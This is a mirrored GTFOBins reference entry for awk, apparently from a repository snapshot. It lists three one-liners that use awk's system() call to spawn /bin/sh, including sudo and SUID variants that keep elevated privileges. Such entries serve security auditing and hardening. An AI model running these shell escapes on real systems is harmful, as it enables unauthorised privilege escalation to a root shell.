1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-08 00:26:05 +02:00
GTFOBins.github.io/_gtfobins/awk.md
2018-05-21 20:14:41 +01:00

215 B

functions
exec-interactive sudo-enabled suid-limited
code
awk 'BEGIN {system("/bin/sh")}'
code
sudo awk 'BEGIN {system("/bin/sh -p")}'
code
./awk 'BEGIN {system("/bin/sh -p")}'